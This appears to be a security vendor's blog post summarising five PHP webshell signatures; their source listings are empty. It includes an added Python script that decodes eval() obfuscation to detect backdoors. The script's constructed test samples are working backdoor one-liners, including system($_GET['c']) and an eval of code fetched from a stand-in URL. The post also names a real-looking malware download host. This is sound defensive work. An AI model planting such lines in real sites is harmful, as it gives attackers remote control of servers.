Top 5 Malware Signatures - Week 29-30
Akos Molnar


We want to keep you up to date, so we collected the Top 5 new malware signatures from the past two weeks! Don't forget that you can create your own malware signatures too. We have seen that crowdsourcing among several thousand servers works fantastically in our IP reputation system, so keep making the internet a safer place together with us! Thanks to your contributions we already have more than 15,000 malware signatures in our database.

#5 PHP Backdoor Remote Code Executor

A simple remote code executor script that receives its payload via cookies and POST parameters. An additional parameter selects which function is applied to the data before it is executed: str_rot13, pack or strrev.

Source code:

#4 PHP Backdoor WSO-Webshell

An obfuscated file manager with an HTML front end. The PHP is base64-encoded and run through eval after decoding. On VirusTotal it is listed under the Tencent detection name Heur: Trojan.Script.LS_Gencirc.7179453.0.

Source code:

#3 PHP Backdoor Eval Obfuscated Ultim4t3 H4x 0r Shell

An advanced webshell for malicious activity. It combines base64, URL and htmlspecialchars encoding and forks a new process. It also matches several YARA rules, both on the source code and on its output.

Source code:

#2 PHP Backdoor Eval Obfuscated Are You Ok 3

The malware downloads the code it executes from domainnamespace.top/lf.txt (198.204.244.186, blacklisted by BitNinja) and checks that file for updates to itself, so the backdoor's owner can change its behaviour simply by editing the file. At the time the SA signature was created, the file contained a complete attacker toolset. Access is password-protected for the attacker.

Source code:
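The #5, #4, #3 and #2 entries above share one pattern: an eval() whose argument is either a string literal wrapped in decoder calls (str_rot13, strrev, base64_decode), raw request data, or code fetched from a remote file. The script below is an added example written for this post, not BitNinja's signature engine and not code from any of the samples: it peels the decoder layers off an eval() chain, reports the real payload, and flags eval() of a remote fetch or of non-literal input. The PHP snippets it scans, including the example.invalid URL, are constructed for this example and are not the files the signatures were written for.

```python
"""Peel common PHP eval() obfuscation layers and report what they hide.

Added detection example (not from the post). Uses only the standard library.
"""
import base64
import codecs
import re
import urllib.parse
import zlib

# PHP decoder name -> Python inverse of the transformation the webshell applied.
DECODERS = {
    "base64_decode": lambda s: base64.b64decode(s).decode("latin-1"),
    "str_rot13": lambda s: codecs.encode(s, "rot13"),
    "strrev": lambda s: s[::-1],
    "urldecode": urllib.parse.unquote,
    "hex2bin": lambda s: bytes.fromhex(s).decode("latin-1"),
    "gzinflate": lambda s: zlib.decompress(s.encode("latin-1"), -15).decode("latin-1"),
}
# Functions that pull the payload from somewhere else at runtime (the #2 pattern).
REMOTE_LOADERS = {"file_get_contents", "curl_exec", "fopen"}

CALL_RE = re.compile(r"\s*@?([A-Za-z_]\w*)\s*\(")
STR_RE = re.compile(r"""\s*(?:'((?:[^'\\]|\\.)*)'|"((?:[^"\\]|\\.)*)")""")
CLOSE_RE = re.compile(r"\s*\)")
EVAL_RE = re.compile(r"\beval\s*\(", re.IGNORECASE)


def parse_chain(src, pos):
    """Parse f1(f2(...('literal')...)) at src[pos]; return (names, literal) or None."""
    names = []
    while True:
        m = CALL_RE.match(src, pos)
        if not m:
            break
        names.append(m.group(1).lower())  # PHP function names are case-insensitive
        pos = m.end()
    m = STR_RE.match(src, pos)
    if not names or not m:
        return None
    literal = m.group(1) if m.group(1) is not None else m.group(2)
    pos = m.end()
    for _ in names:  # every call must be closed, innermost first
        m = CLOSE_RE.match(src, pos)
        if not m:
            return None
        pos = m.end()
    return names, literal


def peel(names, literal):
    """Undo the decoder chain innermost-first. Returns (value, unknown_func_or_None)."""
    value = literal
    for name in reversed(names):
        if name not in DECODERS:
            return value, name
        value = DECODERS[name](value)
    return value, None


def scan(src, depth=0):
    """Return one finding (dict) per eval() in src, recursing into decoded payloads."""
    findings = []
    for m in EVAL_RE.finditer(src):
        parsed = parse_chain(src, m.start())
        if parsed is None:  # eval($_POST[...]), eval($var) and similar
            findings.append({"chain": ["eval"], "payload": None,
                             "reason": "eval of non-literal argument"})
            continue
        names, literal = parsed
        inner = names[1:]  # drop the leading 'eval' itself
        if inner and inner[0] in REMOTE_LOADERS:
            findings.append({"chain": names, "payload": literal,
                             "reason": "eval of remotely loaded code"})
            continue
        payload, unknown = peel(inner, literal)
        if unknown:
            findings.append({"chain": names, "payload": None,
                             "reason": f"unknown decoder {unknown}"})
            continue
        findings.append({"chain": names, "payload": payload,
                         "reason": "eval of obfuscated literal"})
        if depth < 5:  # decoded payloads often hide another eval() layer
            findings.extend(scan(payload, depth + 1))
    return findings


# Constructed samples for this example; none is one of the post's signatures.
SAMPLE_ROT13 = "<?php eval(base64_decode(str_rot13('DUA5p3EyoFtxK0qSISfaLlqqXGf='))); ?>"
SAMPLE_STRREV = '<?php @eval(strrev(";)]\'c\'[TEG_$(metsys")); ?>'
SAMPLE_POST = "<?php eval(str_rot13($_COOKIE['k'] . $_POST['v'])); ?>"
SAMPLE_REMOTE = "<?php eval(file_get_contents('http://example.invalid/lf.txt')); ?>"
SAMPLE_CLEAN = "<?php echo base64_decode('aGVsbG8='); ?>"

if __name__ == "__main__":
    for name, sample in [("rot13", SAMPLE_ROT13), ("strrev", SAMPLE_STRREV),
                         ("post", SAMPLE_POST), ("remote", SAMPLE_REMOTE),
                         ("clean", SAMPLE_CLEAN)]:
        print(name, scan(sample))
```

The parser only follows single-argument decoder calls ending in a string literal, so a pack('H*', ...) wrapper as mentioned for #5, or a chain that ends in a variable, is reported as non-literal rather than decoded; that is still a finding worth looking at, since legitimate code rarely passes anything but constants through eval(). Treat a clean result as "no known pattern matched", not as proof the file is benign.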

#1 PHP Backdoor WSO Webshell

An obfuscated variant of the WSO webshell that disguises itself as a 403 or 404 error page.

Source code:

If you haven't tried BitNinja yet, don't forget to register for the 7-day free trial! No credit card needed!


For our subscribers we also provide valuable information about malware and the most recent news from the cybersecurity world.
